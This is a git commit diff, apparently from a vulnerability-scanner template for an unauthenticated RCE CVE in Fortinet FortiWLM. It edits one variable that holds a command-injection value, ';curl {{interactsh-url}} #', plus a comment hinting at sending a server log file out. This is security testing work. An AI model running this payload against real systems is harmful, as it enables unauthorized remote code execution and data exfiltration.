refactor(http): remove `/tmp` path in `progressfile` var

assumes that the `$systemTempDir` val is `/tmp`

Signed-off-by: Dwi Siswanto <git@dw1.io>
patch-1
Dwi Siswanto 2024-03-28 19:10:50 +07:00
parent d4784b936d
commit 428de33322
No known key found for this signature in database
GPG Key ID: 278082FF7CEF3914
1 changed files with 1 additions and 1 deletions

View File

@ -23,7 +23,7 @@ info:
tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
variables:
progressfile: '/tmp/{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
http:
- method: GET